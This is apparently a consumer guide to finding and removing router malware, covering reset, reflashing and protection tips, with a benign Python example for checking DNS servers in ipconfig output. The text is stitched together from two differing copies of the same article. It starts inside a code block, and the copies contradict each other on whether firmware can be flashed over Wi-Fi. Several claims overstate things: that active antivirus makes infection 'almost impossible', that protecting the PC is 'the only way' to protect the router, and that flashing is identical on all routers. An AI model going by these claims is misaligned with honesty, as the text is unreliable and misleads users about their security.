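DIRECT = """Ping statistics for 203.0.113.10:
    Packets: Sent = 20, Received = 20, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 28ms, Maximum = 35ms, Average = 31ms"""
VIA_ROUTER = """Ping statistics for 203.0.113.10:
    Packets: Sent = 20, Received = 17, Lost = 3 (15% loss),
Approximate round trip times in milli-seconds:
    Minimum = 90ms, Maximum = 410ms, Average = 187ms"""
```

Ping the same target in both measurements; a "router" verdict only says the router path is degraded, which can also be caused by Wi-Fi interference rather than malware.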

Virus Removal

To remove the virus, you need to reset the settings to the default values. If the virus managed to damage the firmware, you will have to install it again yourself.

Reset options

  1. Look for the Reset button on the back of the router. Usually it is smaller than all the others. Hold it down for 10-15 seconds. When the router turns off and starts to reboot, you can release it. The reboot indicates that the settings have been reset. Please note that the password you set will also be lost.

    Press the Reset button

  2. To reconfigure the router, connect it to the computer via cable, then open the browser and go to http://192.168.0.1. The address may be different; you can find it on a sticker on the router itself or in the documentation that came with the router. You will be asked for a login and password; by default the login is admin, and the password is admin or 12345. For more details, see the instructions for the router.
  3. Go to quick setup. Specify the options that suit you. If you want, set a password and change the name of the network. After going through the setup procedure, save the changes and reboot the router.

    Go to the "Quick Setup" section and set convenient settings

After completing all the above steps, check whether the problem is gone. If not, you will have to reflash the router manually.

Flashing the router

Flashing the router is possible only when the device is connected to the computer with a cable. You cannot update the firmware over Wi-Fi.

  1. There is a sticker on the back of the router. Find your router model on it. It also contains information about the version of the firmware installed initially. If its version is 7, then it is better to install the update for version 7, to avoid a conflict between firmware that is too new and the router's older hardware.

    Find out the firmware version and model of the router

  2. Go to the manufacturer's website and use the search box to find the right version for your model. Download it to your computer.

    Find and download the required firmware version

  3. The downloaded file will be archived. Extract its contents to any convenient folder.

    Specify the path to the firmware

  4. Start the update procedure and wait for it to finish. Reboot your router. The firmware should now be updated, and all problems and viruses are most likely gone.

    We are waiting for the installation to finish

How to protect your router from viruses in the future

The only way to protect the router from viruses is to prevent them from getting onto the computer. The computer is protected by antivirus software: install any modern antivirus and do not disable it under any circumstances. It is almost impossible to catch malicious software with an active antivirus. It is not even necessary to use paid security programs; nowadays there are enough high-quality free alternatives.

What to do if nothing helped

If following all the above instructions did not bring the desired result, two options remain: the problem is caused by a hardware fault in the router or by errors on the provider's side. First, call the company that provides your Internet and tell them about your problem and the methods that did not help to solve it. Second, take the router to a service center to be examined by specialists.

Router virus infection is rare, but dangerous. There are two ways to get rid of the virus: resetting the settings and updating the firmware. You also need to make sure that the malware has not remained on the computer.

When the Internet is distributed via Wi-Fi through a router, various problems may appear. For example, slowdowns and high ping may be caused by viruses infecting the router. Let's take a closer look at how to clean the router yourself.

Symptoms

Equipment can be infected with the following types of viruses:

  • viruses that slow down the data transfer rate. For example, a virus can corrupt the settings, causing low speed, signal loss, etc.;
  • viruses that substitute site addresses. It happens like this: a person goes to a resource, the malicious program changes the DNS, and the user is redirected to a site with ads or sees ad blocks that the site owners did not place. This virus is also dangerous because it can redirect to a resource that contains other malicious content.


In any case, if the router is unstable, it is necessary to check it for viruses, which are quite easy to remove.

How does infection occur?

The router distributes the Internet to all gadgets connected to it. This means that all devices operate on the same local network. The virus uses this: it enters the computer through a website or a downloaded file, then through the network it enters the router, where it performs malicious actions.

The severity of the situation depends on the version of the virus program. For example, some malicious programs behave covertly and become active only once they are in the router, while others, on the contrary, can also damage the operating system along the way.

Checking network equipment for infection

Before cleaning the equipment of viruses, you need to check the router for their presence. To do this, connect the Internet cable directly to the computer's port. Pull the WAN (Internet) cable out of the router and connect it to the computer, and then do the following:

  • Launch your browser and open several sites. Make sure that their content is correct and that there are no substituted sites or ad units. For verification, it is better to choose resources that are certain to carry no advertising.
  • Scan your computer with an antivirus program. This is necessary to determine the route of infection: from the computer or from the router. Keep in mind that there may be several viruses, and they may be present both in the system and in the network equipment.
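Because the site substitution described above works by changing DNS, it also helps to look at which DNS servers the computer has actually been handed. The following Python is an added example, not part of the original article: it reads the text of `ipconfig /all` and reports any DNS server that is not in the list you expect. The function names, the expected list and the sample output are assumptions made for illustration.

```python
import ipaddress
import re

def dns_servers(ipconfig_text):
    """Return {adapter name: [DNS server addresses]} from `ipconfig /all` text."""
    servers, adapter, collecting = {}, None, False
    for line in ipconfig_text.splitlines():
        if line and not line[0].isspace():
            # Unindented lines are headings, e.g. "Ethernet adapter LAN:".
            adapter, collecting = line.rstrip(":").strip(), False
            continue
        match = re.match(r"\s+DNS Servers[ .]*: (\S+)", line)
        if match:
            servers.setdefault(adapter, []).append(match.group(1))
            collecting = True
        elif collecting:
            # Further servers follow on lines that hold only an address.
            try:
                ipaddress.ip_address(line.strip())
                servers[adapter].append(line.strip())
            except ValueError:
                collecting = False
    return servers

def unexpected(servers, expected):
    """List (adapter, address) pairs whose resolver is not in the expected set."""
    allowed = {ipaddress.ip_address(a) for a in expected}
    return [(name, addr) for name, addrs in servers.items()
            for addr in addrs if ipaddress.ip_address(addr) not in allowed]

# Constructed sample; 198.51.100.53 is a documentation address standing in
# for a resolver that nobody on this network configured.
SAMPLE = """\
Windows IP Configuration

Ethernet adapter LAN:

   IPv4 Address. . . . . . . . . . . : 192.168.0.23(Preferred)
   Default Gateway . . . . . . . . . : 192.168.0.1
   DNS Servers . . . . . . . . . . . : 192.168.0.1
                                       198.51.100.53
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

# The expected list is whatever you or your provider deliberately set.
FINDINGS = unexpected(dns_servers(SAMPLE), ["192.168.0.1"])
```

When the only server listed is the router's own address, the computer simply forwards queries to the router, so the DNS servers set on the router's settings page need the same comparison.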


Virus Removal

To remove the malware, you need to reset the settings to their original values. If the virus program has already harmed the firmware, it will need to be reinstalled.

Reset options

To clean the router, you need to reset its settings:

  • Find the Reset button on the back of the device. It often stands out from the other buttons. Press and hold it until the router resets and reboots. Remember that the reset erases all settings, and the router will need to be configured again.

  • To configure the router, connect it to the computer using a cable, then launch the browser and type the address 192.168.0.1. It may be different and is indicated on the router itself or in its documentation. When entering the settings, the login is often admin, and the password is the same or 12345. If you fail to log in, look in the instructions for the network equipment.

  • Find the quick setup options. Select all applicable items. You can also change the password and network name. After completing the configuration, save the settings and reboot the router.


After completing all the steps described, check whether you managed to get rid of the problem. If not, you will need to flash the network equipment.

How to perform a flashing?

It happens that a virus program changes the firmware on the router. You can neutralize the infected version by flashing it.

Connect your computer to the router via LAN wire. It should be included with any router. If not, then you can use a Wi-Fi connection. However, a cable connection would be preferable.


After connecting to the router, launch the browser and enter 192.168.1.1 (or another address specified on the device itself) in the address field; you will then need to enter the login and password to open the router settings. The default username and password are both admin. If you cannot get into the settings, you need to find out the current login details; perhaps they were changed after the last installation.

Download the new firmware version from the manufacturer's website, go to the router settings and select the file on the computer's disk. The flashing process is identical for all routers.


Protection of network equipment from viruses

To protect your router from infection, you can use the following recommendations:

  • Update the firmware to the latest version. Visit the manufacturer's website, search for your model and download the latest firmware.
  • Set a complex password on the web interface. Not all routers allow you to change the login. However, if you set a complex password, the web interface will not be easy to break into.
  • Set offline login in router settings.
  • Change the router's LAN IP address. When attacking, the virus will first try addresses such as 192.168.0.1 and 192.168.1.1. For this reason, it is better to change the third and fourth octets of the LAN IP address.
  • Install a reliable antivirus program on your PC. If the virus first tries to enter the computer, it will be removed immediately, which will prevent it from harming the router.
  • Do not store passwords in the browser.


As you can see, checking the router for viruses and cleaning it is easy. Still, it is better to follow these simple tips to prevent infection. If it does happen, you know what to do.